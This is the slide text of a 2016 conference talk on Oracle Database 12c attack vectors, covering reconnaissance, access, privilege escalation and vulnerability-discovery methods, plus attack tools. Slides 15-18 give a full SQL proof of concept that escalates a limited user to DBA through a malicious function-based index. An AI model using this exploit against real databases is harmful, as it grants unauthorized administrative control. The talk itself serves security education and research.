Martin Toshev, profile picture
Uploaded byMartin Toshev
PPTX, PDF2,220 views

Oracle Database 12c Attack Vectors

Martin Toshev presented on attack vectors against Oracle database 12c. He began by providing real world examples of attacks, such as privilege escalation exploits. He then discussed potential attack vectors, including those originating from unauthorized, authorized with limited privileges, and SYSDBA users. Finally, he outlined approaches for discovering new vulnerabilities and recommended tools for testing Oracle database security.

Embed presentation

Downloaded 47 times
Oracle database 12c attack vectors Martin Toshev, BGOUG, 04.06.2016
Who am I Software consultant (CoffeeCupConsulting) BG JUG board member (http://jug.bg) OpenJDK and Oracle RDBMS enthusiast
Who am I Author of Learning RabbitMQ
Agenda • Real world examples • Attack vectors • Attack discovery approach • Tools
Real world examples
Real world examples source: http://tech.firstpost.com/news-analysis/oracles-database-secure-even-nsa-cant-hack-us-say- larry-ellison-217341.html, 30 Jan, 2014
Real world examples However …
Real world examples Source: http://www.cnet.com/news/oracle-databases-easy-to-hack-says-researcher/ "Disable the protocol in Version 11.1 and start using older versions like Version 10g," which is not vulnerable” they didn't fix the current version, which leaves 11.1 and 11.2 still susceptible to attacks
Real world examples Source: http://www.joxeankoret.com/download/tnspoison.pdf/
Real world examples Source: http://www.itsec.gov.cn/webportal/download/2005_Search_Engine_Attack_Database.pdf Simple example: 1) https://www.google.ca/advanced_search 2) search for ‘/isqlplus’ and specify 'URL only' 3) voila
Real world examples Source: http://thehackernews.com/2014/08/Vulnerability-Oracle-Data-Redaction-Security.html
Real world examples Source: http://www.reuters.com/article/us-oracle-hackers-idUSTRE56L66D20090722 http://www.theinquirer.net/inquirer/news/1469225/oracle-databases-hacked-script-kiddies
Real world examples Source: http://www.dba-oracle.com/t_hackers_breaches_horror_stories.htm
Real world examples Source: http://www.davidlitchfield.com/Privilege_Escalation_via_Oracle_Indexes.pdf
Real world examples • Privelege escalation via indexes in 12c: -- from SYS: create c##autoexec user CREATE USER c##autoexec IDENTIFIED BY 123; GRANT CREATE SESSION TO c##autoexec; GRANT CREATE PROCEDURE TO c##autoexec; ALTER USER C##autoexec QUOTA 100M ON USERS; CREATE TABLE foo ( Id int ); INSERT INTO sys.foo values (100); INSERT INTO sys.foo values (50); GRANT INDEX ON foo to c##autoexec; GRANT SELECT, INSERT ON foo TO c##autoexec;
Real world examples • Privelege escalation via indexes in 12c: -- from c##autoexec: attempt to set the DBA role - FAILS SET ROLE DBA;
Real world examples • Privelege escalation via indexes in 12c: -- from c##autoexec CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE 'GRANT DBA TO PUBLIC'; COMMIT; RETURN 'FOO'; END;
Real world examples • Privelege escalation via indexes in 12c: -- from c##autoexec GRANT EXECUTE ON GETDBA TO public; CREATE INDEX EXPLOIT_INDEX ON SYS.FOO(C##AUTOEXEC.GETDBA('')); -- from SYSDBA SELECT * FROM sys.foo; -- from c##autoexec: SUCCESS SET ROLE DBA;
Attack vectors
Attack vectors • Let’s have a look at the high level architecture of the database …
Attack vectors unauthorized authorized (limited permissions) authorized (SYSDBA) OS level
Attack vectors • Attack vectors can originate from different sources depending on the setup (we will abstract ourselves from this criteria): – external (applications running publicly, vulnerable protocols running on the database servers, malware enabling machine access) – internal (employees with non-dba access, DBAs, OS-level users)
Attack vectors • Attacks from unauthorized users: – reconnaissance: • looking for application servers and database tools running on the database publicly • using search engines to find Oracle directory indices, web apps (such as isqlplus) running publicly • port scanning for well known ports (such as 1521 for the TNS listener) on target machines
Attack vectors • Attacks from unauthorized users: – gaining access: • exploring misconfiguration - using default credentials • exploring lack of identity policy – password brute forcing • exploring security bugs (e.g. buffer overflow enabling arbitrary command execution on the TNS listener)
Attack vectors • Attacks from unauthorized users: – data theft: • exploring lack of encryption leading to man-in-the-middle attacks (e.g. TNS listener poisoning or eavesdropping) – DoS/DDoS attacks: • network level DoS (e.g. excessive packets) • buffer overflow DoS (e.g. bug in the TNS listener)
Attack vectors • Attacks from authorized users with limited permissions: – SQL injection (typically caused by buggy applications having a DB user with excessive privileges) – DoS attacks (e.g. due to misconfiguration – excessive connections, filling shared tablespaces, running complex queries)
Attack vectors • Attacks from authorized users with limited permissions: – privilege escalation (e.g. via the INDEX permission) – data theft (e.g. via PL/SQL procedure injection, scheduling opening of remote socket connections to external sources)
Attack vectors • SYSDBA access … the world is yours • OS level access – many methods to retrieve passwords and useful data from raw Oracle database files
Attack discovery approach
Attack discovery approach • Already uncovered security bugs as the ones we discussed are fixed and released by Oracle as critical patch updates • But how to uncover new bugs and ethically report them before being discovered by attackers ?
Attack discovery approach • Explore new features (e.g. multitenancy) • See what parts of the security architecture of the database are in use by these features • Explore changes to the security architecture and new security features
Attack discovery approach • For top 12c new features (at a glance): – consolidation (pluggable databases) – redaction policy
Attack discovery approach • For top 12c new features (at a glance): – consolidation (pluggable databases) – resource utilization of PDBs, access boundary between PDBs, secure data replication between PDBs, discrepancies in local/common users/roles ? – redaction policy – other built-in functions/mechanisms that can reveal redacted data ? (we already saw some)
Attack discovery approach • For top 12c new features (at a glance): – In Line PL/SQL Functions in SQL queries – Online Migration of Table Partition or Sub Partition
Attack discovery approach • For top 12c new features (at a glance): – In Line PL/SQL Functions in SQL queries – bypassing security mechanism, privilege escalation ? – Online Migration of Table Partition or Sub Partition – data theft ?
Attack discovery approach • For top 12c new features (at a glance): – Full Database Caching – SQL translation framework
Attack discovery approach • For top 12c new features (at a glance): – Full Database Caching – buffer overflows, DoS, malicious in-memory data manipulation ? – SQL translation framework – malicious third-party translation plug-ins, security bugs in translation plug- ins ?
Attack discovery approach explore existing attacks and security bugs (e.g. use packet crafting tools to try buffer overflow attacks over enhancements of database protocols) explore vulnerability databases such as CVE for exploits and try to adapt some of them to new database features
Attack discovery approach make use of proper penetration testing tool such as Metasploit to adapt existing attacks for 10g/11g or older versions to 12c analyze new PL/SQL packages for security leaks disassemble Oracle binaries
Attack discovery approach • You may, of course, discover issues not introduced in 12c but rather propagating through multiple versions (such as the TNS poison vulnerability) …
Tools
Tools • nmap • Metasploit • Tnscmd • ODAT (Oracle Database Attacking Tool) • w32dasm/ IDA Freeware • Kali Linux
Tools • ODAT supports 12.1.0.2.0: – try to find valid SIDs and credentials – try to escalate valid account to DBA or SYSDBA – try to execute OS commands from a valid account
Some readings that may bring ideas …
Some readings that may bring ideas …
Thank you ! Q&A
References Oracle 12c Security whitepaper http://www.oracle.com/technetwork/database/security/security-compliance- wp-12c-1896112.pdf Oracle Database 12c architecture overview https://www.youtube.com/watch?v=266ay9N6kAw Oracle Database 12c New security Features http://www.trivadis.com/sites/default/files/downloads/soe_oracle_da tabase_12_new_security_features_summary.pdf
References Oracle Database 12c security http://docs.oracle.com/database/121/nav/portal_25.htm Oracle database security checklist http://www.isaca.org/groups/professional-english/oracle- database/groupdocuments/twp-security-checklist-database-1-132870.pdf Encryption and Redaction in Oracle Database 12c with Oracle Advanced Security http://www.oracle.com/technetwork/database/options/advanced- security/advanced-security-wp-12c-1896139.pdf
References Privelege escalation via Oracle indexes http://www.davidlitchfield.com/Privilege_Escalation_via_Oracle_Indexes.pdf Attacking Oracle with the Metasploit Framework http://www.blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates- OracleMetasploit-SLIDES.pdf Oracle Database TNS Listener Poison Attack http://www.joxeankoret.com/download/tnspoison.pdf
References ODAT (Oracle Database Attacking Tool) tool https://github.com/quentinhardy/odat Oracle Database 12c CVE vulnerabilities statistics https://www.cvedetails.com/product/467/Oracle-Database- Server.html?vendor_id=93 Oracle Database 12c CVE vulnerabilities https://www.cvedetails.com/vulnerability-list/vendor_id-93/product_id- 467/cvssscoremin-5/cvssscoremax-5.99/Oracle-Database-Server.html

More Related Content

PDF
Principes fondamentaux de la sécurité du réseau.
byDjibyMbaye1
 
PPTX
Presntation pfe
byAkram SAYE
 
PDF
Installation Zimbra.pdf
byssuser64f0591
 
PDF
Mise en place d'une Plateforme de Supervision et de Détection d'Intrusion Sys...
byAlaaeddine Tlich
 
PDF
Trunk VoiP Asterisk strongsawn openvpn
byYaya N'Tyeni Sanogo
 
PPTX
Etude et mise en place d'une solution d'administration et de supervision Open...
byChiheb Ouaghlani
 
PPTX
Mise en place des réseaux LAN interconnectés par un réseau WAN
byGhassen Chaieb
 
PDF
Cours3 ospf-eigrp
byBadr Guennoun
 
Principes fondamentaux de la sécurité du réseau.
byDjibyMbaye1
 
Presntation pfe
byAkram SAYE
 
Installation Zimbra.pdf
byssuser64f0591
 
Mise en place d'une Plateforme de Supervision et de Détection d'Intrusion Sys...
byAlaaeddine Tlich
 
Trunk VoiP Asterisk strongsawn openvpn
byYaya N'Tyeni Sanogo
 
Etude et mise en place d'une solution d'administration et de supervision Open...
byChiheb Ouaghlani
 
Mise en place des réseaux LAN interconnectés par un réseau WAN
byGhassen Chaieb
 
Cours3 ospf-eigrp
byBadr Guennoun
 

What's hot

PPSX
Reverse-Engineering Pour le Fun et le Profit
bySoufiane Tahiri
 
PDF
Process injection - Malware style
bySander Demeester
 
PDF
Alphorm.com Formation Nagios et Cacti : Installation et Administration
byAlphorm
 
PDF
Alphorm.com Formation PRTG Network Monitor : installation et configuration
byAlphorm
 
PPSX
Typologie des réseaux informatiques
byATPENSC-Group
 
PPTX
Administration reseau
bynadimoc
 
PDF
Cambridge 15
byLily Pham
 
PPTX
Installation et configuration d'un système de Détection d'intrusion (IDS)
byCharif Khrichfa
 
PDF
Initiation à l’analyse réseau avec Wireshark.pdf
byDrm/Bss Gueda
 
PDF
Introduction aux réseaux informatiques
byZakariyaa AIT ELMOUDEN
 
PDF
Simulation d'un réseau Ad-Hoc sous NS2
byRihab Chebbah
 
PDF
Hanon - the Virtuoso Pianist
byjimmylio
 
PDF
Mehari 2010-manuel-de-reference-2-14
byimen1989
 
PPTX
Mise en place d'une soltion de communication unifiée
bydartenien
 
PDF
Cours etherchannel
byEL AMRI El Hassan
 
PPT
Ccnp securite vpn
bysara ousaoud
 
DOC
Corrigé cisco wissamben
byWissam Bencold
 
PDF
MONITORING APPLICATIF
byYoussef NIDABRAHIM
 
PDF
Virtuals LAN
byThomas Moegli
 
PDF
Sach asterisk tieng viet full
byltphong_it
 
Reverse-Engineering Pour le Fun et le Profit
bySoufiane Tahiri
 
Process injection - Malware style
bySander Demeester
 
Alphorm.com Formation Nagios et Cacti : Installation et Administration
byAlphorm
 
Alphorm.com Formation PRTG Network Monitor : installation et configuration
byAlphorm
 
Typologie des réseaux informatiques
byATPENSC-Group
 
Administration reseau
bynadimoc
 
Cambridge 15
byLily Pham
 
Installation et configuration d'un système de Détection d'intrusion (IDS)
byCharif Khrichfa
 
Initiation à l’analyse réseau avec Wireshark.pdf
byDrm/Bss Gueda
 
Introduction aux réseaux informatiques
byZakariyaa AIT ELMOUDEN
 
Simulation d'un réseau Ad-Hoc sous NS2
byRihab Chebbah
 
Hanon - the Virtuoso Pianist
byjimmylio
 
Mehari 2010-manuel-de-reference-2-14
byimen1989
 
Mise en place d'une soltion de communication unifiée
bydartenien
 
Cours etherchannel
byEL AMRI El Hassan
 
Ccnp securite vpn
bysara ousaoud
 
Corrigé cisco wissamben
byWissam Bencold
 
MONITORING APPLICATIF
byYoussef NIDABRAHIM
 
Virtuals LAN
byThomas Moegli
 
Sach asterisk tieng viet full
byltphong_it
 

Viewers also liked

PPTX
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
byRob Fuller
 
PPTX
hacking with node.JS
byHarsha Vashisht
 
PPTX
Oracle database threats - LAOUC Webinar
byOsama Mustafa
 
PDF
Attacking Oracle with the Metasploit Framework
byChris Gates
 
PPTX
Security Architecture of the Java platform
byMartin Toshev
 
PDF
Think Like a Hacker - Database Attack Vectors
byMark Ginnebaugh
 
PPTX
Przetwarzanie asynchroniczne w zastosowaniach webowych
byleafnode
 
PPTX
Modular Java
byMartin Toshev
 
PDF
Eclipse plug in development
byMartin Toshev
 
PPTX
Writing Stored Procedures with Oracle Database 12c
byMartin Toshev
 
PPTX
JVM++: The Graal VM
byMartin Toshev
 
PPTX
Spring RabbitMQ
byMartin Toshev
 
PDF
KDB database (EPAM tech talks, Sofia, April, 2015)
byMartin Toshev
 
PPTX
RxJS vs RxJava: Intro
byMartin Toshev
 
PPTX
Security Аrchitecture of Тhe Java Platform
byMartin Toshev
 
PPTX
Modularity of The Java Platform Javaday (http://javaday.org.ua/)
byMartin Toshev
 
PPTX
Writing Stored Procedures in Oracle RDBMS
byMartin Toshev
 
PPTX
Writing Java Stored Procedures in Oracle 12c
byMartin Toshev
 
PDF
Asynchroniczny PHP i komunikacja czasu rzeczywistego z wykorzystaniem websocketw
byLuke Adamczewski
 
PDF
Sécurité informatique : le Retour sur Investissement que vous n'attendiez pas
byMaxime ALAY-EDDINE
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
byRob Fuller
 
hacking with node.JS
byHarsha Vashisht
 
Oracle database threats - LAOUC Webinar
byOsama Mustafa
 
Attacking Oracle with the Metasploit Framework
byChris Gates
 
Security Architecture of the Java platform
byMartin Toshev
 
Think Like a Hacker - Database Attack Vectors
byMark Ginnebaugh
 
Przetwarzanie asynchroniczne w zastosowaniach webowych
byleafnode
 
Modular Java
byMartin Toshev
 
Eclipse plug in development
byMartin Toshev
 
Writing Stored Procedures with Oracle Database 12c
byMartin Toshev
 
JVM++: The Graal VM
byMartin Toshev
 
Spring RabbitMQ
byMartin Toshev
 
KDB database (EPAM tech talks, Sofia, April, 2015)
byMartin Toshev
 
RxJS vs RxJava: Intro
byMartin Toshev
 
Security Аrchitecture of Тhe Java Platform
byMartin Toshev
 
Modularity of The Java Platform Javaday (http://javaday.org.ua/)
byMartin Toshev
 
Writing Stored Procedures in Oracle RDBMS
byMartin Toshev
 
Writing Java Stored Procedures in Oracle 12c
byMartin Toshev
 
Asynchroniczny PHP i komunikacja czasu rzeczywistego z wykorzystaniem websocketw
byLuke Adamczewski
 
Sécurité informatique : le Retour sur Investissement que vous n'attendiez pas
byMaxime ALAY-EDDINE
 

Similar to Oracle Database 12c Attack Vectors

PDF
Presentation database security audit vault & database firewall
byxKinAnx
 
PDF
AV/DF Advanced Security Option
byDLT Solutions
 
PDF
DOAG Oracle Database Vault
byStefan Oehrli
 
DOCX
Database Security – Issues and Best PracticesOutline
byOllieShoresna
 
PDF
ppt-security-dbsat-222-overview-nodemo.pdf
bycamyla81
 
PDF
Hacking databases
bysunil kumar
 
PDF
Oracle database 12c security and compliance
byFITSFSd
 
PDF
DATABASE PRIVATE SECURITY JURISPRUDENCE: A CASE STUDY USING ORACLE
byIJDMS
 
PDF
Database Private Security Jurisprudence: A Case Study using Oracle
byIJDMS
 
PDF
Dr3150012012202 1.getting started
byNamgu Jeong
 
PDF
Presentation anatomy of a database attack
byxKinAnx
 
PDF
Best Practices for implementing Database Security Comprehensive Database Secu...
byKal BO
 
PDF
Hacking databases
bysunil kumar
 
PDF
Ce hv6 module 42 hacking database servers
byVi Tính Hoàng Nam
 
PDF
Oracle Database 11g Security and Compliance Solutions - By Tom Kyte
byEdgar Alejandro Villegas
 
PPTX
An AMIS Overview of Oracle database 12c (12.1)
byMarco Gralike
 
PDF
An AMIS overview of database 12c
byGetting value from IoT, Integration and Data Analytics
 
PPTX
Security Inside Out: Latest Innovations in Oracle Database 12c
byTroy Kitch
 
PDF
A1802030104
byIOSR Journals
 
PDF
Engineered Systems - nejlepší cesta, jak zabezpečit váš dataAccelerate Cloud
byMarketingArrowECS_CZ
 
Presentation database security audit vault & database firewall
byxKinAnx
 
AV/DF Advanced Security Option
byDLT Solutions
 
DOAG Oracle Database Vault
byStefan Oehrli
 
Database Security – Issues and Best PracticesOutline
byOllieShoresna
 
ppt-security-dbsat-222-overview-nodemo.pdf
bycamyla81
 
Hacking databases
bysunil kumar
 
Oracle database 12c security and compliance
byFITSFSd
 
DATABASE PRIVATE SECURITY JURISPRUDENCE: A CASE STUDY USING ORACLE
byIJDMS
 
Database Private Security Jurisprudence: A Case Study using Oracle
byIJDMS
 
Dr3150012012202 1.getting started
byNamgu Jeong
 
Presentation anatomy of a database attack
byxKinAnx
 
Best Practices for implementing Database Security Comprehensive Database Secu...
byKal BO
 
Hacking databases
bysunil kumar
 
Ce hv6 module 42 hacking database servers
byVi Tính Hoàng Nam
 
Oracle Database 11g Security and Compliance Solutions - By Tom Kyte
byEdgar Alejandro Villegas
 
An AMIS Overview of Oracle database 12c (12.1)
byMarco Gralike
 
An AMIS overview of database 12c
byGetting value from IoT, Integration and Data Analytics
 
Security Inside Out: Latest Innovations in Oracle Database 12c
byTroy Kitch
 
A1802030104
byIOSR Journals
 
Engineered Systems - nejlepší cesta, jak zabezpečit váš dataAccelerate Cloud
byMarketingArrowECS_CZ
 

More from Martin Toshev

PPTX
Big data processing with Apache Spark and Oracle Database
byMartin Toshev
 
PPTX
Spring RabbitMQ
byMartin Toshev
 
PPTX
Security Architecture of the Java Platform (BG OUG, Plovdiv, 13.06.2015)
byMartin Toshev
 
PPTX
Security Architecture of the Java Platform (http://www.javaday.bg event - 14....
byMartin Toshev
 
PPTX
New Features in JDK 8
byMartin Toshev
 
PPTX
Modularity of the Java Platform (OSGi, Jigsaw and Penrose)
byMartin Toshev
 
PPT
Semantic Technology In Oracle Database 12c
byMartin Toshev
 
PPTX
The RabbitMQ Message Broker
byMartin Toshev
 
PPT
Java 9 Security Enhancements in Practice
byMartin Toshev
 
PPTX
java2days 2014: Attacking JavaEE Application Servers
byMartin Toshev
 
PPTX
Building highly scalable data pipelines with Apache Spark
byMartin Toshev
 
PPTX
Java 9 sneak peek
byMartin Toshev
 
PPTX
Practical security In a modular world
byMartin Toshev
 
PPT
Jdk 10 sneak peek
byMartin Toshev
 
PDF
Concurrency Utilities in Java 8
byMartin Toshev
 
Big data processing with Apache Spark and Oracle Database
byMartin Toshev
 
Spring RabbitMQ
byMartin Toshev
 
Security Architecture of the Java Platform (BG OUG, Plovdiv, 13.06.2015)
byMartin Toshev
 
Security Architecture of the Java Platform (http://www.javaday.bg event - 14....
byMartin Toshev
 
New Features in JDK 8
byMartin Toshev
 
Modularity of the Java Platform (OSGi, Jigsaw and Penrose)
byMartin Toshev
 
Semantic Technology In Oracle Database 12c
byMartin Toshev
 
The RabbitMQ Message Broker
byMartin Toshev
 
Java 9 Security Enhancements in Practice
byMartin Toshev
 
java2days 2014: Attacking JavaEE Application Servers
byMartin Toshev
 
Building highly scalable data pipelines with Apache Spark
byMartin Toshev
 
Java 9 sneak peek
byMartin Toshev
 
Practical security In a modular world
byMartin Toshev
 
Jdk 10 sneak peek
byMartin Toshev
 
Concurrency Utilities in Java 8
byMartin Toshev
 

Recently uploaded

PPTX
Intoduction_to_Maven best java tool for project management
byparasbramhankar02
 
PDF
Boobanker Token – Smart Contract Security Audit Report by EtherAuthority
byEtherAuthority1
 
PDF
Build Vs. Buy: Cloud Cost Management and FinOps
byAmnic
 
PPTX
Best AI Agent Development Company | Intelligent Automation Solutions
byYash Singh
 
PDF
White-Label Development vs In-House Tech Teams: Key Differences
byShiv Technolabs Pvt. Ltd.
 
PPTX
Cache management across scenarios_version5.pptx
bykamarajsindhuja1
 
PPTX
Python_Lecture13_Introduction to PyQt.pptx
byamanaydana
 
PPTX
College Management System.pptx
bygehlotyash2005
 
PDF
Top 10 Ways AI Can Improve SEO Strategies in 2025.pdf
bybpractseo
 
PDF
Evolution of Microsoft Project Portfolio Management - What Modern PMOs Are Do...
byOnePlan Solutions
 
PDF
Cost to Develop a Careem Clone App in the UAE
byMobility Infotech
 
PPTX
AI and Automation Software | Best AI and Automation Software
byEasy Clinic
 
PPTX
School-Hall-Pass-System-Modernizing-Student-Movement-Management.pptx
byinfoswipesolutionsin
 
PPTX
AI in Payroll Automate & Optimize Workforce Management
byMatellio
 
PDF
Cloud-based Hotel PMS_ Why hotels Must Upgrade Now.pdf
byHotelogix
 
PPTX
Scrape Grocery App Data from BigBasket, Zepto, and Blinkit.pptx
byMobile App Scraping
 
PDF
12 Simple Ways to Attract Direct Bookings.pdf
byHotelogix
 
PPTX
EMR software | Best EMR software | EasyClinic
byEasy Clinic
 
PDF
How an HR Management System Can Transform Your HR Processes.pdf
byVihan Richard
 
PDF
Simplify Finances with Qandle’s Expense Software.pdf
byQandle
 
Intoduction_to_Maven best java tool for project management
byparasbramhankar02
 
Boobanker Token – Smart Contract Security Audit Report by EtherAuthority
byEtherAuthority1
 
Build Vs. Buy: Cloud Cost Management and FinOps
byAmnic
 
Best AI Agent Development Company | Intelligent Automation Solutions
byYash Singh
 
White-Label Development vs In-House Tech Teams: Key Differences
byShiv Technolabs Pvt. Ltd.
 
Cache management across scenarios_version5.pptx
bykamarajsindhuja1
 
Python_Lecture13_Introduction to PyQt.pptx
byamanaydana
 
College Management System.pptx
bygehlotyash2005
 
Top 10 Ways AI Can Improve SEO Strategies in 2025.pdf
bybpractseo
 
Evolution of Microsoft Project Portfolio Management - What Modern PMOs Are Do...
byOnePlan Solutions
 
Cost to Develop a Careem Clone App in the UAE
byMobility Infotech
 
AI and Automation Software | Best AI and Automation Software
byEasy Clinic
 
School-Hall-Pass-System-Modernizing-Student-Movement-Management.pptx
byinfoswipesolutionsin
 
AI in Payroll Automate & Optimize Workforce Management
byMatellio
 
Cloud-based Hotel PMS_ Why hotels Must Upgrade Now.pdf
byHotelogix
 
Scrape Grocery App Data from BigBasket, Zepto, and Blinkit.pptx
byMobile App Scraping
 
12 Simple Ways to Attract Direct Bookings.pdf
byHotelogix
 
EMR software | Best EMR software | EasyClinic
byEasy Clinic
 
How an HR Management System Can Transform Your HR Processes.pdf
byVihan Richard
 
Simplify Finances with Qandle’s Expense Software.pdf
byQandle
 

Oracle Database 12c Attack Vectors

  • 1.
    Oracle database 12c attackvectors Martin Toshev, BGOUG, 04.06.2016
  • 2.
    Who am I Softwareconsultant (CoffeeCupConsulting) BG JUG board member (http://jug.bg) OpenJDK and Oracle RDBMS enthusiast
  • 3.
    Who am I Authorof Learning RabbitMQ
  • 4.
    Agenda • Real worldexamples • Attack vectors • Attack discovery approach • Tools
  • 5.
  • 6.
    Real world examples source:http://tech.firstpost.com/news-analysis/oracles-database-secure-even-nsa-cant-hack-us-say- larry-ellison-217341.html, 30 Jan, 2014
  • 7.
  • 8.
    Real world examples Source:http://www.cnet.com/news/oracle-databases-easy-to-hack-says-researcher/ "Disable the protocol in Version 11.1 and start using older versions like Version 10g," which is not vulnerable” they didn't fix the current version, which leaves 11.1 and 11.2 still susceptible to attacks
  • 9.
    Real world examples Source:http://www.joxeankoret.com/download/tnspoison.pdf/
  • 10.
    Real world examples Source:http://www.itsec.gov.cn/webportal/download/2005_Search_Engine_Attack_Database.pdf Simple example: 1) https://www.google.ca/advanced_search 2) search for ‘/isqlplus’ and specify 'URL only' 3) voila
  • 11.
    Real world examples Source:http://thehackernews.com/2014/08/Vulnerability-Oracle-Data-Redaction-Security.html
  • 12.
    Real world examples Source:http://www.reuters.com/article/us-oracle-hackers-idUSTRE56L66D20090722 http://www.theinquirer.net/inquirer/news/1469225/oracle-databases-hacked-script-kiddies
  • 13.
    Real world examples Source:http://www.dba-oracle.com/t_hackers_breaches_horror_stories.htm
  • 14.
    Real world examples Source:http://www.davidlitchfield.com/Privilege_Escalation_via_Oracle_Indexes.pdf
  • 15.
    Real world examples •Privelege escalation via indexes in 12c: -- from SYS: create c##autoexec user CREATE USER c##autoexec IDENTIFIED BY 123; GRANT CREATE SESSION TO c##autoexec; GRANT CREATE PROCEDURE TO c##autoexec; ALTER USER C##autoexec QUOTA 100M ON USERS; CREATE TABLE foo ( Id int ); INSERT INTO sys.foo values (100); INSERT INTO sys.foo values (50); GRANT INDEX ON foo to c##autoexec; GRANT SELECT, INSERT ON foo TO c##autoexec;
  • 16.
    Real world examples •Privelege escalation via indexes in 12c: -- from c##autoexec: attempt to set the DBA role - FAILS SET ROLE DBA;
  • 17.
    Real world examples •Privelege escalation via indexes in 12c: -- from c##autoexec CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE 'GRANT DBA TO PUBLIC'; COMMIT; RETURN 'FOO'; END;
  • 18.
    Real world examples •Privelege escalation via indexes in 12c: -- from c##autoexec GRANT EXECUTE ON GETDBA TO public; CREATE INDEX EXPLOIT_INDEX ON SYS.FOO(C##AUTOEXEC.GETDBA('')); -- from SYSDBA SELECT * FROM sys.foo; -- from c##autoexec: SUCCESS SET ROLE DBA;
  • 19.
  • 20.
    Attack vectors • Let’shave a look at the high level architecture of the database …
  • 21.
    Attack vectors unauthorized authorized (limitedpermissions) authorized (SYSDBA) OS level
  • 22.
    Attack vectors • Attackvectors can originate from different sources depending on the setup (we will abstract ourselves from this criteria): – external (applications running publicly, vulnerable protocols running on the database servers, malware enabling machine access) – internal (employees with non-dba access, DBAs, OS-level users)
  • 23.
    Attack vectors • Attacksfrom unauthorized users: – reconnaissance: • looking for application servers and database tools running on the database publicly • using search engines to find Oracle directory indices, web apps (such as isqlplus) running publicly • port scanning for well known ports (such as 1521 for the TNS listener) on target machines
  • 24.
    Attack vectors • Attacksfrom unauthorized users: – gaining access: • exploring misconfiguration - using default credentials • exploring lack of identity policy – password brute forcing • exploring security bugs (e.g. buffer overflow enabling arbitrary command execution on the TNS listener)
  • 25.
    Attack vectors • Attacksfrom unauthorized users: – data theft: • exploring lack of encryption leading to man-in-the-middle attacks (e.g. TNS listener poisoning or eavesdropping) – DoS/DDoS attacks: • network level DoS (e.g. excessive packets) • buffer overflow DoS (e.g. bug in the TNS listener)
  • 26.
    Attack vectors • Attacksfrom authorized users with limited permissions: – SQL injection (typically caused by buggy applications having a DB user with excessive privileges) – DoS attacks (e.g. due to misconfiguration – excessive connections, filling shared tablespaces, running complex queries)
  • 27.
    Attack vectors • Attacksfrom authorized users with limited permissions: – privilege escalation (e.g. via the INDEX permission) – data theft (e.g. via PL/SQL procedure injection, scheduling opening of remote socket connections to external sources)
  • 28.
    Attack vectors • SYSDBAaccess … the world is yours • OS level access – many methods to retrieve passwords and useful data from raw Oracle database files
  • 29.
  • 30.
    Attack discovery approach •Already uncovered security bugs as the ones we discussed are fixed and released by Oracle as critical patch updates • But how to uncover new bugs and ethically report them before being discovered by attackers ?
  • 31.
    Attack discovery approach •Explore new features (e.g. multitenancy) • See what parts of the security architecture of the database are in use by these features • Explore changes to the security architecture and new security features
  • 32.
    Attack discovery approach •For top 12c new features (at a glance): – consolidation (pluggable databases) – redaction policy
  • 33.
    Attack discovery approach •For top 12c new features (at a glance): – consolidation (pluggable databases) – resource utilization of PDBs, access boundary between PDBs, secure data replication between PDBs, discrepancies in local/common users/roles ? – redaction policy – other built-in functions/mechanisms that can reveal redacted data ? (we already saw some)
  • 34.
    Attack discovery approach •For top 12c new features (at a glance): – In Line PL/SQL Functions in SQL queries – Online Migration of Table Partition or Sub Partition
  • 35.
    Attack discovery approach •For top 12c new features (at a glance): – In Line PL/SQL Functions in SQL queries – bypassing security mechanism, privilege escalation ? – Online Migration of Table Partition or Sub Partition – data theft ?
  • 36.
    Attack discovery approach •For top 12c new features (at a glance): – Full Database Caching – SQL translation framework
  • 37.
    Attack discovery approach •For top 12c new features (at a glance): – Full Database Caching – buffer overflows, DoS, malicious in-memory data manipulation ? – SQL translation framework – malicious third-party translation plug-ins, security bugs in translation plug- ins ?
  • 38.
    Attack discovery approach exploreexisting attacks and security bugs (e.g. use packet crafting tools to try buffer overflow attacks over enhancements of database protocols) explore vulnerability databases such as CVE for exploits and try to adapt some of them to new database features
  • 39.
    Attack discovery approach makeuse of proper penetration testing tool such as Metasploit to adapt existing attacks for 10g/11g or older versions to 12c analyze new PL/SQL packages for security leaks disassemble Oracle binaries
